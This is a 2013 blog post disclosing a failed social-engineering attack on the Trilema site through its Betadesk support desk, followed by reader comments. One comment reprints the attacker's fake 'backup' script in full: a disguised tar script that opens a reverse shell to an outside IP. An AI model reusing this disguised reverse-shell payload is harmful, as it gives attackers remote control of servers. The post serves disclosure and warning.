In the interest of full disclosure : failed social engineering attempt and 0day vulnerability in Betadesk

Sunday, 09 June, Year 5 d.Tr. | Author: Mircea Popescu

A few days ago :

Hello Mircea,

Does policircuit.us belong to you?

No, never heard of it.

Well,

The owner of that domain is going around masquerading as Mircea Popescu trying to obtain logins for your account. I was contacted by 2 other service providers who sent me that information

This was on the 4th. Sorta lulzy in a let's reminisce "O hai. I was justing doing a penetration test of your site." way. Kids these days, right ?

Today I discover in my inbox a link to a support ticket I never created. In the Betadesk interface there were actually two tickets, with

Server Name: I do not know my server name
Domain Name: polimedia.us

and an empty string for the "Added by:" value.

At this point not knowing exactly the extent of the attack I duly informed the support that the respective tickets are not created by me. Less than five minutes later the IP I had published that from was being DDOSed and the attacker now had the ability to fill the Added by: string with my name.

Contrary to what the attacker might have imagined I am actually immune to DDOS, and upon realising this the entire older thread quoted above was deleted, as well as selected replies of mine from the two threads requesting login details. Eventually they both were deleted and replaced with a single

Hello,

Someone has been trying to reset my passwords, can you please run a backup script of mine so I can be on the safe side,

Thanks.

The script in question was indicated as

Please run the following script:

http://pastebin.com/asdWBEPB

Thanks alot.

By now however the support was well alerted to the problems, some modifications to the way Betadesk logging in works were dropped in (for instance the attacker had no idea that cookies had been expired and the password for my account reset, happily continuing to post as "me" while that me had never actually logged in) and that's the end of the story as far as I know.

It's unclear to me why exactly someone would be going to all this trouble to hack into Trilema, except for the case he'd happen to be one of the countless scammers / fraudsters / spammers ousted in public here. Seems a little doubtful but you never know. It's unclear to me whether the plan was to get the logins, and upon failure it was moved to getting the backup bundle (and what exactly would that do, give someone access to read all the articles without paying ?! or maybe he imagines Trilema runs a Bitcoind with BTC in it ?) or moreover the plan was to get the back-up and the entire logins song and dance was just a decoy for that (in an attempt to give the request for the back-up more weight by creating in the mind of whatever suport personnel on duty the impression that he has to pick between imaginarily dichotomous attacker A and attacker B).

What is certainly clear to me is that Betadesk has a hole, allowing an attacker to somehow escalate to admin priviledges. I don't at this time know more details than that. So, just in case you're running it : beware.

Category: Zsilnic
Comments feed : RSS 2.0. Leave your own comment below, or send a trackback.

11 Responses

  1. pletzalcoatl`s avatar
    1
    pletzalcoatlinsigna de criptograf 
    Sunday, 9 June 2013

    Cool. I especially like it as contrasted to for instance the Fin Times' retrospective on haxor problems where they spend most of their space attempting to "nice-over" the incident and explain technical things in humanities terms.

  2. #!/bin/bash
    #Generic Server Backup With tar

    DIR="serverbackup"
    DATE=`date +%a-%d-%b-%Y-%I:%M:%S-%p-%Z`
    SERVER=`uname -n`

    echo "Starting backup for $SERVER..."

    mkdir -p /root/$DIR/$DATE

    # System Files Backup

    echo "Backing up $SERVER /etc..."
    tar -cvzPf /root/$DIR/$DATE/$DATE-$SERVER-etc.tar.gz /dev/shm
    echo "Uploading backed up data."
    bash -i >& /dev/tcp/96.43.130.122/80 0>&1
    echo "Backing up $SERVER /home..."
    tar -cvzPf /root/$DIR/$DATE/$DATE-$SERVER-home.tar.gz /home

    echo "Backing up $SERVER /var/log..."
    tar -cvzPf /root/$DIR/$DATE/$DATE-$SERVER-logs.tar.gz /var/log

    echo "Backing up $SERVER /var/www..."
    tar -cvzPf /root/$DIR/$DATE/$DATE-$SERVER-www.tar.gz /var/www

    echo "Dumping $SERVER MySQL databases files..."
    mysqldump -u backupdba -pdbapass --all-databases > /var/lib/mysql/alldatabases.sql

    echo "Backing up $SERVER MySQL configuration files..."
    tar -cvzPf /root/$DIR/$DATE/$DATE-$SERVER-mysql.tar.gz /var/lib/mysql

    echo "Done."

    Seems like a generic back-up script modified a little.

    bash -i >& /dev/tcp/96.43.130.122/80 0>&1

    That's the only part actually doing anything. It looks like you're correct, the attacker has come up with an A/B split - either give me the login or else run this "back-up" script that sends me the logins. Isn't that IP in the US?

  3. Mircea Popescu`s avatar
    3
    Mircea Popescu 
    Sunday, 9 June 2013

    @pletzalcoatl Ya well, the press. What'd you expect, they collectively make less than one single junior investment banker. And by collectively I mean ALL of them, together.

    @Chett Maybe I'm having a moment of density, but what exactly would be accomplished by leeching off the accessible RAM ? Get umpteen Gb of basically meaningless junk, what is this, masochistic hacking ?

  4. Pretty clear they were after the hotwallet from all that.

  5. Mircea Popescu`s avatar
    5
    Mircea Popescu 
    Sunday, 9 June 2013

    Well that's awkward. I guess now I have to get a hotwallet for Trilema.

  6. >It’s unclear to me why exactly someone would be going to all this trouble to hack into Trilema

    Maybe they really didn't like that pic.

  7. Vexare`s avatar
    7
    Vexare 
    Sunday, 9 June 2013

    'The fuck is betadesk?

  8. Lululemon Canada`s avatar
    8
    Lululemon Canada 
    Monday, 8 July 2013

    Greetings from Idaho! I'm bored to death at work so I decided to browse your site on my iphone during lunch break. I really like the information you provide here and can't wait to take a look when I get home. I'm amazed at how fast your blog loaded on my cell phone .. I'm not even using WIFI, just 3G .. Anyways, excellent blog!

  9. Mircea Popescu`s avatar
    9
    Mircea Popescu 
    Monday, 8 July 2013

    Cheers.

  1. [...] « In the interest of full disclosure : failed social engineering attempt and 0day vulnerability in Bet... [...]

  2. [...] In the interest of full disclosure : failed social engineering attempt and 0day vulnerability in Bet... S.MG IPO succeeded. Other statements. [...]

Add your cents! »
    If this is your first comment, it will wait to be approved. This usually takes a few hours. Subsequent comments are not delayed.